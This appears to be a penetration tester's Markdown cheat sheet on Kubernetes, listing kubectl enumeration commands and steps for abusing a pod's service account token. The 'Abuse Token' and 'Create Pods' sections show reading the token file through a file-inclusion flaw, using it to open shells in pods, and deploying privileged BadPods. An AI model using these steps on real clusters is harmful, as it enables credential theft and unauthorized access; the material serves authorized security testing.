38 lines
950 B
Markdown
38 lines
950 B
Markdown
|
# Kubectl
|
||
|
|
|
||
|
|
```sh
|
||
|
|
kubectl get pods
|
||
|
|
```
|
||
|
|
* Check mounted secret
|
||
|
|
```sh
|
||
|
|
kubectl auth can-i --list
|
||
|
|
kubectl get secrets
|
||
|
|
kubectl get nodes
|
||
|
|
kubectl get deployments
|
||
|
|
kubectl get services
|
||
|
|
kubectl get ingress
|
||
|
|
kubectl get jobs
|
||
|
|
```
|
||
|
|
* Intel about a secret, and output
|
||
|
|
```sh
|
||
|
|
kubectl describe secrets <secret>
|
||
|
|
kubectl describe secrets <secret> -o 'json'
|
||
|
|
```
|
||
|
|
## Abuse Token
|
||
|
|
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
|
||
|
|
* By change of an LFI extract the token and
|
||
|
|
```sh
|
||
|
|
kubectl auth can-i --list --token=$TOKEN
|
||
|
|
kubectl get pods --token=$TOKEN
|
||
|
|
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
|
||
|
|
```
|
||
|
|
|
||
|
|
## Create Pods
|
||
|
|
|
||
|
|
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
|
||
|
|
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
|
||
|
|
```sh
|
||
|
|
kubectl apply -f pod.yml --token=$TOKEN
|
||
|
|
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
|
||
|
|
```
|